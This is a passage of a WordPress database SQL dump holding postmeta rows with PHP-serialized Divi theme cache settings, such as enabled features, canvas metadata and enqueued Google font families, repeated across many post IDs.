tion_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33319,1579,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33320,1501,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33321,1501,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33313,799,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33314,799,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33315,799,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33316,1579,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33308,763,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33309,763,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33310,763,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33311,763,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33312,799,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33295,1514,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33296,1093,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33297,1093,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33298,1093,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33299,1093,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33300,1524,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33301,1524,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33302,1524,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33303,1524,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33304,1108,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33305,1108,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33306,1108,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33307,1108,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33291,903,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33292,1514,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33293,1514,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33294,1514,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33287,550,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33288,903,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33289,903,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33290,903,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33283,541,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33284,550,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33285,550,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33286,550,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33280,541,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33281,541,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33282,541,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33276,1198,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33277,1198,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33278,1198,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33279,1198,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33271,1092,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33272,600,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33273,600,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33274,600,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33275,600,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33267,670,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33268,1092,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33269,1092,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33270,1092,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33263,905,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33264,670,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33265,